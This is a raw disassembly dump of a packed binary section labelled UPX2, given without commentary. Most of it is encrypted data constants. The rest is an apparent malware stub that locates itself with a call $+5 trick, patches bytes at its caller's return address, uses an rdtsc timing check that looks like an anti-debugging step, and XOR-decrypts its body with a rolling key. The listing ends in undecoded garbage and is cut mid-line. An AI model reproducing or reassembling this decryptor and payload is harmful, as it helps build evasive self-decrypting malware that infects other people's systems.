80CC4F24h, 0A6753186h, 0C42AA428h dd 0A4C77B27h, 0E05AE250h, 3E72EC66h, 26B463FBh, 204B1C96h dd 8745CB50h, 6EC73843h, 70EA64DEh, 8CC02176h, 0EF10990Eh dd 0D75DC206h, 0B625E450h, 8E0BB076h, 4F5AD50Bh, 75FB78A6h dd 5FDE04FBh, 24A75F96h, 1A836ABh, 75D30992h, 0B02AA4F4h dd 886DBC36h, 0AD57C15Dh, 0BF72BE23h, 950E963Fh, 28FDD18h dd 45F671DCh, 5DDE58C8h, 29A637CDh, 188334F6h, 0E1DA0D9Eh dd 0FD32E868h, 0D34FD466h, 0BC2CDD42h, 9429F462h, 91168207h dd 30B06310h, 7FA811BBh, 28D940CFh, 78B522AFh, 508608BFh dd 0A87B1D92h, 807EFA6Fh, 0D055C548h, 0B66AE84Ah, 8E42AE39h dd 6E1F9D1Ch, 51B27FE2h, 59CB53BEh, 42CF06C2h, 12BF3C99h dd 0A934C83h, 0FF73A49Bh, 0CE02B063h, 0AE5FDD5Ch, 0F86DBF22h dd 95078B1Dh, 7CCBDC57h, 0E97DAEh, 5DDF45D2h, 2483649Fh dd 4C22FF1h, 0A19F008Fh, 0A8D50802h, 0FFFEDE1Dh, 0D8E4A81Fh dd 8034ABE1h, 30ED2066h, 5C28A5D6h, 0EACED0CAh, 0F998507Eh dd 46B10FE6h, 70EA64DEh, 88027CF6h, 0A01A940Eh, 0B832AC26h dd 0D04AC43Eh, 0E862DC56h, 7AF46Eh, 18920C86h, 30AA249Eh dd 48C23CB6h, 60DA54CEh, 78F26CE6h, 900A84FEh, 0A8229C16h dd 0C03AB42Eh, 0D852CC46h, 0F06AE45Eh, 882FC76h, 209A148Eh dd 38B22CA6h, 50CA44BEh, 68E25CD6h, 4792EC61h, 4CB70F66h dd 0B02A9221h, 0F79A19B5h, 0EF5AD478h, 7566AFD1h, 0A7851C2Dh dd 0F8A11ADDh, 649E7025h, 2ADE0EEDh, 78A85FC7h, 0CA896885h dd 0AC58BF1Ah, 87E639AFh, 55C3C408h, 0E854E38Eh, 0C2F9F185h dd 794BEEAEh, 0B8AA205Ch, 7EE65A33h, 60BEBCCEh, 679A6CE6h dd 1D0A84FEh, 9E010F93h, 0D803ED2Eh, 18D1C032h, 0F9D065Ah dd 3EBD48F3h, 0F96DD78Eh, 1CD4A1A5h, 40294488h, 0E71E2C29h dd 8412F7EEh, 59B7AE4h, 0B01C878Dh, 0BC4286B5h, 0E368FF4Bh dd 0B6FFFC14h, 4ED15C82h, 5CA22615h, 0AB88CBAAh, 48A0B3C5h dd 8F153336h, 0A3CC5709h, 96254C83h, 0F331F426h, 55C5070Ah dd 0E854E3EEh, 3FCE71A9h, 18920CB0h, 0C42249Eh, 0C3C23CB6h dd 56E5E04Bh, 8E6484E6h, 88E27B01h, 2B229C16h, 0F6050093h dd 0D027CC46h, 0D46579D7h, 9469FC40h, 1F2E9971h, 0B7712C90h dd 66F5FC3Bh, 0DC77D5D6h, 68FA42D1h, 98128C05h, 3BE96D2Dh dd 0C8423CA5h, 0DB2864Eh, 0FB8D1398h, 26B5DCEBh, 0AB741F96h dd 4FBA38D4h, 58D34B42h, 6090E7DEh, 758673F6h, 2B1A940Eh dd 5062A064h, 2FB53AF6h, 0D7BA5955h, 0C679F458h, 989A86D6h dd 29DE2467h, 3CECC536h, 913114CDh, 0F9F3246Dh, 4FD55B1Fh dd 0ECDB1DC9h, 0B53AF862h, 107995AAh, 0FF901DDDh, 8824BF9h dd 581B728Eh, 37801F58h, 50CAEF3Bh, 52610AD6h, 0BFF01EEh dd 9AF99C4Ch, 4129AE95h, 36305467h, 55592BB1h, 0F844D3BEh dd 684A81D3h, 0AC26136Dh, 0BFBA34AEh, 6EED9473h, 250234DEh dd 8BFD8308h, 96254C8Bh, 60B72326h, 0D34AF201h, 6B31F852h dd 0DB49F6AEh, 0FB9ABA89h, 1063A48Ch, 6CE6FDE5h, 44C67DCAh dd 23D660CFh, 11E36FBEh, 13F593EDh, 4104C0F3h, 0B61764BDh dd 715C9085h, 0A9B9A58Dh, 0A1B46071h, 8D90FA5Dh, 0D1EC3012h dd 300BCF2Dh, 1E4001Dh, 0C0FBF1FDh, 313CD0EDh, 0ED7DFACDh dd 6154A0AFh, 0DD4DDC9Dh, 0EF8C709Fh, 1E9DA403h, 31536FAEh dd 62DB339h, 99FEA65Dh, 77FD8219h, 0A47096CDh, 4D04447Eh dd 45C23BC1h, 0E854FA16h, 184B4C08h, 0FC52EE84h, 5648269Dh dd 10C4561Dh, 9F2F4F26h, 7030EF19h, 95605579h, 5D2C744Eh dd 3ABA4BD1h, 6859BF45h, 0B0EFE60Eh, 0A282CA50h, 48F03365h dd 0C23286FEh, 0E0D231BDh, 9C0CB4C7h, 81428B11h, 1C128C06h dd 6127D0CCh, 238842D6h, 585F3FB8h, 7872EC66h, 0D335E6D5h dd 1012891Bh, 97913498h, 0AF119631h, 46D2C15Bh, 88027CF6h dd 608F9B06h, 4E394CE7h, 0E67267BBh, 0EE17DD56h, 25F3F908h dd 9D641F6Dh, 309C1C3Dh, 2EC449B4h, 8BFF65C3h, 79FF0AE2h dd 78A1E2DBh, 57DD63AAh, 490EF7A5h, 0EE6D00D3h, 7A94F5Eh dd 3EBA59F3h, 209A148Eh, 0F82723AEh, 0B860F8BAh, 971DA34Ah dd 0BF2AE167h, 1DE48C30h, 0B01C9CBDh, 0C746C937h, 0CB583F7Fh dd 0FB147A6h, 26B2A1FBh, 28A21C96h, 0CA9D40A6h, 6EEAD343h dd 7B0AA5DEh, 0CD897190h, 58AA3F68h, 27B7268Ch, 114AF206h dd 8F67C7B6h, 0AB7C7D0Ah, 0B3F4CCB5h, 54123675h, 0E3C23939h dd 5845D144h, 20F66CD0h, 3B12643Fh, 43DE2CD5h, 2B82D20Eh dd 33F9AA46h, 0A86E8E47h, 0F771039Eh, 0F29E9971h, 5EBACC67h dd 360ACDBBh, 0D8E1B77Dh, 8290DE7Eh, 6BF4645Eh, 62AE5BE1h dd 0C0288E42h, 13803C16h, 328C1399h, 0D5FEC70Ch, 0E1D6D668h dd 9BCEFE50h, 54A68638h, 7C9EAE20h, 8476B608h, 6DF16DBEh dd 71D95196h, 15A1318Eh, 298924E6h, 0B0C779ADh, 0EF923ABEh dd 692811Bh, 48C23CB6h, 0D0D9204Eh, 0FD05C686h, 903CBC5Bh dd 0A0229C16h, 9582B35Ah, 735220CDh, 55EF1311h, 0B82CA4Eh dd 2F9B148Eh, 38B2FB22h, 0FA22F4BEh, 0D45FD57Dh, 30FA42D1h dd 11B926EEh, 861564A3h, 6DC74B36h, 0E35AE276h, 8C72EC66h dd 0B50FF36Bh, 28A22AAEh, 34BB34AEh, 0A613A4C3h, 995A9B21h dd 0D89D75Ch, 0A02CABB2h, 701963ADh, 0EF8E79B7h, 0A0EBDC60h dd 641D4C92h, 2B393A79h, 0C701425Eh, 7EFA9933h, 60DA57CEh dd 8EFC18E6h, 0A632277Bh, 0AD561C16h, 3FC4F6C6h, 0BC3574B9h dd 0C3C1C2D7h, 0FF299AB6h, 16A2B10Bh, 38B22FA6h, 0A69F30BEh dd 5EDAFF53h, 858FF4EEh, 67EC92EEh, 4D8E4CE1h, 0E8F243C9h dd 1FA162A6h, 9E4B0F99h, 769FFBC6h, 0A3098D3Dh, 7682913Bh dd 0AF00BBC6h, 70EA671Ch, 601609F6h, 5FE56970h, 28DAB396h dd 0B6B53BC5h, 8E7723EEh, 8BD165C5h, 0DC178749h, 1BAA12A1h dd 0B48AB57Eh, 587FD139h, 78F16CD0h, 0BE7E84FEh, 908719E1h dd 0C03AB418h, 0FA26CA46h, 0C8CF61A9h, 882FC40h, 25EF158Eh dd 0C74FDE4Eh, 0F54FB341h, 68E26AEEh, 0F4FE74EEh, 661F6403h dd 35DD5BE1h, 0C8748493h dd 0E05AD44Ah, 9F9AFB12h, 0A875FB80h, 0E05CDCBFh, 80B28C05h dd 0E07948B2h, 17019CABh, 2D878B5Dh, 0A81AA236h, 0CD32AC26h dd 73F74471h, 0E862EA6Eh, 3B92B21Ah, 0A06DF378h, 0F9833CB7h dd 705D99BCh, 841A54F8h, 0E75766E5h, 3B0AB2C6h, 22882DA6h dd 0F60217ABh, 98E26646h, 0C8F56154h, 6E28FC40h, 0D767F636h dd 0E8A8923h, 50CA54BEh, 0D8E528D6h, 389CDEA7h, 33747073h dd 83804CAEh, 75CB17F6h, 0E06CEBE6h, 0C0D76991h, 10AA0448h dd 21D71C96h, 0C5B06C1Eh, 58E4745Bh, 0F1520274h, 2D878B36h dd 0E01AA236h, 0CC32AC26h, 0F88E443Dh, 0D0FF795Ch, 0AB1CF458h dd 273EB10Fh, 0C70124A8h, 7EFA9933h, 60DA54CEh, 0C8FB19A6h dd 0D8F86AEh, 222AA2Eh, 0F89F31D9h, 0D8D2CC70h, 0FB1FE45Eh dd 8D8844C6h, 20AC2C10h, 5E8FC70Ch, 0A7D27506h, 5EDAF953h dd 80FB74EEh, 2810F806h, 2E8FAE37h, 8428A0Eh, 4550D7AAh dd 0F844D4F8h, 0A8ECAF18h, 0AD55EC17h, 408C0C0Bh, 58D24EC6h dd 0B85E66ABh, 0B09CD9FCh, 0B7C9438h, 87FA11AFh, 60F2C408h dd 4362DC7Eh, 38DF7199h, 189A0CB0h, 41DE249Eh, 0B73F0D5Eh dd 0C55FA331h, 78F25ADEh, 0E50A84FAh, 0A29A2C1Dh, 0F6022BABh dd 95B96646h, 0C8CF61A9h, 82FC40h, 31EF148Eh, 0D83194C0h dd 6855E1B4h, 0C3845CE0h, 6B50B4DDh, 0B1AAEA13h, 2F8FAE06h dd 8428A0Eh, 4550D7AAh, 0F844D4F9h, 957DAF18h, 28942433h dd 40BA24AEh, 9853F4A0h, 0B46A67AAh, 17A776FEh, 0C61AA236h dd 3D84A38Dh, 0D07CFC9Dh, 14A234FDh, 858D0B91h, 18A43423h dd 70AA249Eh, 187235C2h, 5847D1CCh, 8F586CD0h, 0A632217Bh dd 0A8029C16h, 0B5BC042Eh, 5556C844h, 55E01A11h, 8B4C4EBh dd 1F2A9907h, 93D42C90h, 25CFB83Eh, 0E8E2ECD1h, 2ABA8BA1h dd 67EEF5EEh, 15AF53E1h, 0C8428A0Eh, 865AD40Eh, 8D438ADEh dd 76A3B07Ch, 22BAAC3Dh, 7682AB2Bh, 5B328CC6h, 8CBE8C74h dd 0B28309h, 98BF11F9h, 3832AC10h, 0D23FC43Eh, 4DE85AE6h dd 4CCCF3h, 0E412A7E0h, 80AD519Bh, 0B78DBCB6h, 4B32FE8Eh dd 8F0D931Ah, 0A632217Bh, 0A9229C16h, 7031C12Eh, 45D7C606h dd 5A6AD266h, 0B0E4F39Dh, 8590D40Dh, 3884143Bh, 517AEFD8h dd 0CD67AB7Ch, 80FA42D6h, 0ED128E06h, 15AF5331h, 0C8428A0Eh dd 955AD04Eh, 0F2B25C7Ch, 26B29BFBh, 8C079696h, 81BA0296h dd 0E0B45C26h, 0C041E5B8h, 380A97F6h, 3F9F9E4Eh, 12329A1Eh dd 0E8EF41C9h, 0E862DC60h, 100FF466h, 0F011B4E0h, 8348194h dd 0E3A43C80h, 6831557Eh, 0FDF82456h, 903CBC60h, 0DA76BBCh dd 0C03A8216h, 6952DC46h, 964F912Bh, 27A7FCEh, 16A28A2Bh dd 0B194AA6h, 0EDE3EE7Eh, 68D46366h, 0B85FF119h, 98128C30h dd 0AF5FA43Eh, 0D3A9CB87h, 0F8536C28h, 0C0EC496Ch, 0F44A0448h dd 0B6071695h, 26BA0296h, 0E86F656Dh, 0FAEA52E1h, 38A7F637h dd 0C61AA231h, 0BA6A1C8Dh, 0E67259BBh, 6D957656h, 4CCCCBh dd 19920C85h, 0B55D06EAh, 48F40413h, 64DA54CEh, 0FD057A93h dd 903CBC5Bh, 0AB229C16h, 44D2B15Bh, 30AD33BCh, 0F951EF5h dd 30277981h, 209A14B8h, 3BC624A6h, 0A7608D0Eh, 5EDAF953h dd 80FA74EEh, 2832F886h, 2DAF8E19h, 9428A0Eh, 6957CEAEh dd 0FA72C86Eh, 26B299DBh, 2B46DC96h, 0EBBEF02Eh, 3E782D76h dd 7A0A9B66h, 0BE3AE153h, 57B1F20Eh, 8E0A09A3h, 0D04AE43Eh dd 1F31A856h, 364251EBh, 18920C86h, 0C7A750BEh, 48C23F71h dd 0D0DF20CEh, 8B19C676h, 1D814375h, 0A814A3BEh, 81B37505h dd 0D20A7CBAh, 0C65279DBh, 8D755676h, 20AC2C2Bh, 38F22CA6h dd 0E8AC48CAh, 0EDE89F86h, 80CC4C73h, 207486EDh, 152044E1h dd 0C87484ABh, 65AD7F28h, 0F844D4C3h, 118A047Dh, 0AD556FE2h dd 408C0C0Bh, 78D24CC6h, 0B71D69AAh, 88027CF5h, 30AA917Ah dd 33C1478Ch, 10CF4FF1h, 0C362EA69h, 0FC327DA6h, 9D65C5B5h dd 309C1C3Bh, 48423CB6h, 0E5575ABBh, 78C4547Bh, 104A8C74h dd 50519FEFh, 84F7B0A3h, 1952DC62h, 7BDAECBEh, 6E841FDDh dd 465A2536h, 0B70A4A0Dh, 50722C3Eh, 89E05CD6h, 2BA2DF88h dd 9E674583h, 701B1C78h, 0BF21750h, 50DF59E4h, 0F72DA5Eh dd 26B2A1FBh, 28A21C96h, 17BC41BEh, 0B38AB4EDh, 58B9EFC7h dd 582984DDh, 9FD21985h, 2D33AC10h, 0D07CFB96h, 0ACE9E557h dd 0BDF3F04Ah, 18A41CE1h, 0F069915h, 0CDE93C80h, 60EC6B66h dd 4057E911h, 904A84C8h, 0AA569C16h, 2916CD9h, 8F04CC42h dd 0CF8A59DDh, 782FC40h, 209BCD0Ah, 38BFC4A6h, 158144BEh dd 24A71284h, 0C4D446DDh, 6712C04Ah, 8611368Bh, 3CC73536h dd 0B35AE271h, 0FB4EB4EDh, 38F9FBA6h, 0C0965F1Dh, 0BF45C14Eh dd 6706D94Dh, 73B164E8h, 0D8B70B4h, 0A02CABF6h, 313AEE25h dd 0E67538BBh, 0C0115756h, 0FA4791h, 0A17A0C86h, 0BB55DB6Bh dd 7EFDE80Bh, 0CD3202CEh, 0F30D9313h, 0A635506Bh, 0A0681716h dd 0EB36FE2Dh, 0DDBB4F88h, 0F10A6C51h, 8C8DFC76h, 209A15D4h dd 76A99A5h, 0E5C94488h, 68D4634Eh, 8F124842h, 98122E83h dd 0B46C291Eh, 0F7DA391Dh, 0E659D478h, 0D180436h, 0AD09FB81h dd 28942342h, 7BB141AEh, 0DBDD4081h, 70EA65C5h, 1D3B701Dh dd 0A02CABDAh, 0B93F2929h, 5549C43Eh, 0E854E3CEh, 0FF427508h dd 0E41703A3h, 0BBAA249Eh, 0BE93EF6h, 4D3204FAh, 410D9313h dd 0A6355043h, 4CA79316h, 0C33AB42Eh, 0EE6D14C3h, 68EFE75Eh dd 8382CA49h, 2CDD3F8Eh, 387FAEA9h, 17F144BEh, 0AC6153DEh dd 3FA74EEh, 0DF118EC6h, 28AFA70Ah, 9A428A09h, 14EF2B1Eh dd 772DA59h, 26B156EBh, 0E8274696h, 400DB1A1h, 0C43B4CC6h dd 4CEA64DEh, 1C877309h, 201A940Eh, 3D3DB918h, 0D04AC4B5h dd 0C3639ADDh, 0E82AC02Dh, 0E76DF83Ah, 0F7E99A7h, 3FB73C80h dd 5F02D1CDh, 0FDF16CD0h, 903CBB66h, 0E822199Fh, 0C0B1B418h dd 0E7AA497Dh, 0F818E468h, 377E794Dh, 49E814B8h, 38B22C9Bh dd 0B8FD36CEh, 68E25CC9h, 0B063A63h, 9B10A7C7h, 3511B45Ch dd 0C874FC36h, 24D9D83Bh, 77431376h, 7196203Ah, 0A761077Dh dd 76858C2Bh, 0ED592CC6h, 70DC5B46h, 77F7261Eh, 0A0B3F5F1h dd 0CDB2AC26h, 0DC0DEF30h, 0AF59D524h, 3CF8FB66h, 516DF379h dd 0CE18A191h, 7449C349h, 0C57DD5EAh, 87F26CCEh, 7B757B01h dd 8C681D54h, 203AB44Eh, 5392FF08h, 75EDC052h, 8B4C396h dd 1F469107h, 813F2C90h, 50CA6C17h, 577AD9D5h, 259C74D8h dd 5E39C2A3h, 9B3EE61Dh, 8E84B074h, 619D3CB5h, 0F872EC34h dd 108A047Bh, 775E5A1Fh, 0BFEDF7F0h, 6EE9D253h, 6F02A5DEh dd 8918F9F9h, 0F44A940Eh, 4758844Ch, 0EBB451C1h, 28E7DC60h dd 5F2FB31h, 0F0920C87h, 0CF55C1DEh, 48C22D5Eh, 14BF07CEh dd 1D9E05A0h, 0E569E1ADh, 0D156F564h, 75C5B46Fh, 0D864F32Ah dd 0CB3871A1h, 8D0BFC40h, 20AC2BFAh, 38B2354Eh, 4AF17BEh dd 278737B7h, 0F29F1A99h, 0E87BE475h, 0C643D64Eh, 0AF27D05Fh dd 80DD42Bh, 78D0577h, 108A1796h, 7AC74F96h, 2FCE47CBh dd 2A8229B4h, 1C8312B7h, 88671B93h, 48E97C59h, 0AADA53D9h dd 834AC43Eh, 8B039E33h, 500A8105h, 71E465F4h, 55CD41F2h dd 9E2A6BB6h, 8825AB26h, 78F26CFEh, 0F849E1ADh, 0CD45F277h dd 0A94EDB60h, 0AA02B520h, 9C039237h, 8E79B13h, 0C829FCD9h dd 6CE2D359h, 6A7AC133h, 0C885CE0h, 0D7FB1EBEh, 0A41819F9h dd 8CA3A428h, 8ED74312h dd 0CA5AE275h, 90CF61A6h, 408A3240h, 9D5D4CC6h, 408C0E1Eh dd 5CD24DAEh, 718030DEh, 0FC9783A1h, 0F41AA231h, 4765A84Ch dd 0E675B0ABh, 0FCA65F56h, 3F164191h, 8D6D0CB0h, 309C1F1Ch dd 0FD4FFFE9h, 60EC6AA6h, 0FE6793B0h, 130AB2C5h, 2C2D63EEh dd 0C03AB495h, 0E72A49CFh, 0F000E468h, 0CA170320h, 0A59A22B5h dd 9C362366h, 7BCA44BEh, 2B20C16h, 819024EDh, 98128C6Eh dd 25D5F2DEh, 0C8748754h, 0EFA52CCDh, 0F87704E2h, 6C0F8D7Eh dd 0A5A22AA9h, 7685B423h, 0D047C1C6h, 21EA52E1h, 0D80216A4h dd 9B9401F1h, 40B1AC10h, 66CECBC1h, 8262DC53h, 7CCF0B6Eh dd 0E7923AB9h, 691AE0Bh, 0B73ABFB6h, 6545D0C1h, 0FD7B6CE6h dd 903CBB6Eh, 6B215525h, 0AA6BE47Fh, 6DAD9D42h, 0F05CDB22h dd 33E46989h, 0E01F14B8h, 3DC9A8A9h, 99F944BEh, 5776D95Fh dd 0D1AB74D8h, 980DE457h, 4F7AA411h, 0FE7912A3h, 0EF9A514Eh dd 0F877D8E2h, 880F8D7Eh, 0EBA22AA9h, 40CA3C16h, 6099C7C6h dd 484FE129h, 88027CC0h, 0A66F840Eh, 0A8552925h, 279C408h dd 19951D55h, 85F31599h, 18A43322h, 30828B26h, 7489B7B6h dd 70BDD1CDh, 0AAC16CD0h, 61FD45FDh, 2DAB7DE1h, 0C00C8BB2h dd 93E5C385h, 0C5891D58h, 79AAFFBh, 238E5739h, 0F9D96576h dd 0D11A4796h, 19503ECh, 9D8E8D80h, 991EF685h, 0FBA1446Ch dd 0DC00370Ah, 6D4A964Dh, 0F8DA422h, 2B4B27A7h, 1E9D8C13h dd 1431F7AEh, 98E15CE2h, 7052E651h, 3C17CF6h, 2D117FC1h dd 8E0CC49Bh, 0FC1383Eh, 0D4CE1565h, 3C7C860Fh, 34907BFCh dd 6C968EBEh, 66FED0C2h, 60E689BAh, 0B1118493h, 0D5378575h dd 0DC22D94Eh, 83698925h, 5D5DCC14h, 0F951B6Dh, 5FBFFFFDh dd 2FD95AC7h, 0C74D0A22h, 139D7941h, 0ECED1283h, 7F058BF5h dd 0AB51DB3Bh, 0A0AEAB2Ch, 0F5BD43C9h, 0AF0E871Eh, 7776869h dd 0CBB9FB81h, 0D75C317Eh, 0A8AA4151h, 0A72DB03Ch, 8F144536h dd 64867309h, 93E56BF0h, 0B82444F4h, 0B3A2C43Eh, 9D23A9h dd 7AF46Eh, 4B7F8DDBh, 0D9AA12ADh, 48C23F6Dh, 0EBE8ABAAh dd 4ECDF453h, 0B283E0FEh, 0E51C1D70h, 4BFBB74h, 5352CC45h dd 2E69D800h, 58B97D10h, 941F1BCBh, 0CFB22CA5h, 70CA52FDh dd 0EDED5CD6h, 80FA7749h, 9A4ECFF0h, 0B3B72011h, 8BC9BC36h dd 40FAE946h, 7C7D4CC6h, 108A07F1h, 8823CABh, 0C43E3B8Eh dd 0B0D24CC5h, 8F159A67h, 8B7BFEF9h, 599940Eh, 0B80493FAh dd 0D8084F3Eh, 0C37296DDh, 337E87AFh, 1B97E746h, 20E0AD56h dd 7762B93Fh, 2AD954F8h, 78F2D4EAh, 785B84FFh, 57DD7B86h dd 0F899211Eh, 0F8E3CC70h, 0C8CE516Eh, 28E8FC40h, 58C2DD70h dd 0DFC4C4B2h, 824FBB41h, 0BB20C8D9h, 256F450Ch, 7312BA3Eh dd 15AF53FBh, 0C8428A0Eh, 945BD44Eh, 5DF71B44h, 138A3246h dd 5DA21C96h, 0E51FB5A2h, 0A7D27AFEh, 9B119B21h, 2D8FFDFCh dd 0A01AA236h, 0D03AAC26h, 0D04AC438h, 0E864B40Fh, 0E822F46Eh dd 0E76DEBAEh, 837A114h, 0CC443C80h, 56E2C9E4h, 0E577E4E6h dd 720AB2C6h, 0DA76BF6h, 0C83A8216h, 0AD52CC46h, 6FD76457h dd 982CA4Eh, 0A56DD1FAh, 38841403h, 58CA44BEh, 0D56247A2h dd 80CC4C73h, 18A2F803h, 86123AA3h, 6F36B936h, 0D8C569CEh dd 8C77EC50h, 0B50FF3E0h, 28A22AAEh, 343A34AEh, 0C56FCCCFh dd 72EA52E6h, 2D81F581h, 0A02CABEEh, 4B354426h, 0B1A23BC1h dd 9D23ABh, 7AF61Eh, 270E910Dh, 0ADA924A8h, 48F40316h dd 9F262D26h, 28766319h, 1B0A84FCh, 9E1D04A3h, 0FC643F2Eh dd 0A2BA1245h, 0FF951BA3h, 880C6F4h, 4D0958Eh, 0D8B22CC6h dd 698BA35h, 6BF626D5h, 50D6494h, 9824B4A3h, 0A02AA41Eh dd 75CBA843h, 0E06CEBAAh, 0C0C259EBh, 9D010448h, 28940CF1h dd 0F9ED905Dh, 58D246EAh, 60EAD153h, 2DF17CC0h, 0A2F994BFh dd 3DC508D5h, 0D07CFC9Bh, 0F862DC56h, 0D47061h, 6B6D0C86h dd 0DE1CCCB6h, 0DD49C349h, 60EC6B1Ah, 0FCFDBE63h, 900A8466h dd 97BA299Dh, 8AB1B418h, 0FC184D56h, 106AE43Eh, 7B8AB65Dh dd 2353278Ch, 0B58938D4h, 50FC54D9h, 7885D15Dh, 0D68874D8h dd 1B36B08Dh, 863AC3BBh, 6FC1BC36h, 0E05AD429h, 0F0086766h dd 13824E7Fh, 0A3559B61h, 7685982Bh, 0FD57BBC6h, 30EA52E6h dd 0FC027CF6h, 0A302630Ch, 881BA054h, 0EFAA71B7h, 9BE9DC60h dd 0F74AF546h, 2EAAA903h, 30AA649Eh, 0BFC048B6h, 293205D6h dd 210D931Ah, 0E3098815h, 0A450B73Eh, 64C9E27Fh, 6DDF9519h dd 0F05CDCEEh, 376641FFh, 846914B8h, 9BD72F9h, 834DC92Ch dd 52E25CD6h, 0B6C2D77Bh, 0F114F906h, 847CDCCCh, 38123424h dd 1F8074A6h, 0B2F9B699h, 0C00772h, 10079961h, 40BA3498h dd 195F5CC6h, 0F9F911DBh, 0BE3D9C7Bh, 0C79F970Eh, 3B329A36h dd 0D04AA399h, 0AB49DC56h, 52FD7D46h, 0EF920C86h, 696441Bh dd 48C23DB6h, 0A7DD20CEh, 0D85264A5h, 15FD245Eh, 0A814A4B3h dd 403AB42Eh, 3000CB32h, 0F951324h, 0E80F772Ch, 0C39A22B1h dd 10F9A5A3h, 0DD414955h, 68D4630Ah, 8311760Dh, 6F3AC78Dh dd 8612019Bh, 0C842BF36h, 6B4EA04Eh, 0CE4D08E3h, 0C007077Eh dd 2BA22AA9h, 7685F82Bh, 0D3DA4DC6h, 0F5617494h, 8834436Ah dd 0D312DE37h, 0B0782525h, 535A863Fh, 63628435h, 364550EBh dd 30226486h, 72AB249Eh, 0BC365BEh, 0C34FDE9Eh, 8FF25ADEh dd 0A632217Bh, 0A8229C16h, 0C33CC03Eh, 0EE42ABCBh, 76A525Eh dd 3EBA59F3h, 229A148Eh, 0C6A659A6h, 0F54FB378h, 68E26AEEh dd 0F5FA70EEh, 3CA70600h, 472A9226h, 0FE7A19B3h, 0E01AD44Eh dd 72799966h, 0BA480679h, 0DF40CA94h, 47303D45h, 5A788EF4h dd 431D8608h, 0AA891824h, 0F8181B6Ah, 874E11A5h, 0DF4AC408h dd 179802D2h, 98CF0B91h, 0E7923AB9h, 691F60Bh, 0DC77C3B6h dd 9FDA62F1h, 4EC92A73h, 108709FEh, 2522AA29h, 0F6053CBBh dd 0B2009D46h, 8CDF1B5Eh, 0F782CA49h, 16A1D21Bh, 4407D3A6h dd 0AFCA7281h, 5ED91A43h, 0E84FF9EEh, 6712BA38h, 8615DCABh dd 5DBDEA36h, 0E06CEF8Ch, 0C70E49E5h, 0D38A0448h, 28A21C7Eh dd 41D069AEh, 6F62A147h, 80B264E8h, 0FC87BDF9h, 251AA21Bh dd 70B16FE6h, 114534C1h, 0DE77A8D3h, 1047376Eh, 6D922686h dd 4C2B4282h, 39AE3092h, 88BA47BBh, 870D9322h, 44E2818Bh dd 40DD63ECh, 3FC54BFCh, 0F5ADE227h, 0E25EB226h, 882D9CEh dd 8572748Eh, 4D4DD359h, 748ECF87h, 57D1E6h, 0BFA42D0h dd 19748456h, 0C328A224h, 0C82AEA13h, 6B5A2B4Eh, 0AA7286A2h dd 21FFB2Eh, 0ABA22AAAh, 7E3B3C6Ah, 4ED739Ah, 0B66967ABh dd 728394F2h, 0DFF26BF1h, 0D9CD53D9h, 0D03E7CFDh, 5989DC56h dd 7ADBD6h, 188FE486h, 1068249Eh, 48F284B6h, 703254CEh dd 0BAF26CE6h, 15B284DAh, 40229C17h, 0C03AB42Dh, 5552E084h dd 3D66C00Ah, 87A7F58h, 0C8FA0DF2h, 38B22CA6h, 60EE1035h dd 0E9F8D78Bh, 0B6C2F303h, 79A86406h, 724B5BE1h, 0CA43BC32h dd 0E55DD24Dh, 615F931Bh, 15FF2971h, 1001194h, 90h, 1CDh dup(0) dd 12FFE000h, 13D2h dup(0) ; --------------------------------------------------------------------------- loc_3146A000: ; DATA XREF: UPX2:3146CFE8o call $+5 mov eax, [esp] cld mov [eax+2FE3h], ebx test dword ptr [eax+28A0h], 80000000h mov ebx, [esp+4] jz short loc_3146A04B pop ecx mov [eax+2FE7h], esi mov [eax+2FEBh], edi cmp byte ptr [eax+28A4h], 0E8h jnz short loc_3146A042 add ebx, [eax+28A5h] mov ebx, [ebx+2] push dword ptr [ebx] jmp short loc_3146A04A ; --------------------------------------------------------------------------- loc_3146A042: ; CODE XREF: UPX2:3146A033j mov ebx, [eax+28A6h] push dword ptr [ebx] loc_3146A04A: ; CODE XREF: UPX2:3146A040j pop ebx loc_3146A04B: ; CODE XREF: UPX2:3146A01Dj push ebp mov ebp, eax sub dword ptr [esp+4], 8005h sub ebp, 361005h mov edi, [esp+4] lea esi, [ebp+3638B0h] mov ecx, 0DDh rep movsb loc_3146A06D: ; CODE XREF: UPX2:3146A0DEj call sub_3146A0C0 mov ecx, eax call sub_3146A0C0 sub eax, ecx jz short loc_3146A094 cmp eax, 100h ja short loc_3146A094 lea eax, [ebp+3610D3h] mov dl, [eax-10h] call sub_3146A0C4 jmp short loc_3146A0D3 ; --------------------------------------------------------------------------- loc_3146A094: ; CODE XREF: UPX2:3146A07Bj ; UPX2:3146A082j test dword ptr [ebp+3638A5h], 80000000h jz short loc_3146A0BE lea esi, [ebp+3638A9h] mov edi, [esp+4] movsb movsd mov esi, [ebp+363FECh] mov edi, [ebp+363FF0h] mov ebx, [ebp+363FE8h] loc_3146A0BE: ; CODE XREF: UPX2:3146A09Ej pop ebp retn ; =============== S U B R O U T I N E ======================================= sub_3146A0C0 proc near ; CODE XREF: UPX2:loc_3146A06Dp ; UPX2:3146A074p rdtsc retn sub_3146A0C0 endp ; --------------------------------------------------------------------------- db 76h ; =============== S U B R O U T I N E ======================================= sub_3146A0C4 proc near ; CODE XREF: UPX2:3146A08Dp mov dh, dl mov ecx, 27D2h loc_3146A0CB: ; CODE XREF: sub_3146A0C4+Cj xor [eax], dl inc eax add dl, dh loop loc_3146A0CB ; CODE XREF: UPX2:3146A143j retn sub_3146A0C4 endp ; --------------------------------------------------------------------------- loc_3146A0D3: ; CODE XREF: UPX2:3146A092j test dword ptr [edi], 3BB12862h mov ebx, 7AC868CBh loope loc_3146A06D add dl, ah loope loc_3146A121 dec esp retn ; --------------------------------------------------------------------------- dw 0AE38h dd 459B7551h, 38D431FFh, 73907255h, 5E13CED9h, 6DA3F9FCh dd 0F4C3F22Eh, 0C7D3A92Ch, 83B81A1h, 32D22265h, 9FA147ECh dd 95EF0FECh, 0CB2C862Dh, 0FB6950A6h, 5A04BBDFh db 7Fh ; --------------------------------------------------------------------------- loc_3146A121: ; CODE XREF: UPX2:3146A0E2j sbb ah, al bswap edi mov cl, 0B7h cdq mov al, ds:607C1B54h icebp xchg eax, ebx push ebp pusha dec ebp inc ebx inc ebp les ebp, [esi+39048E18h] pushf or [edi-25A07FC9h], ebp dec esi int 3 ; Trap to Debugger jnb short near ptr loc_3146A0D0+1 push ecx xchg edi, [eax] in eax, dx pop edi push ss std or dh, [edx-75EB6C40h] add ds:3AB9079Eh, dh mov eax, ds:0F243C67Fh leavew ; --------------------------------------------------------------------------- db 0FEh dd 5FB61527h, 980388C9h, 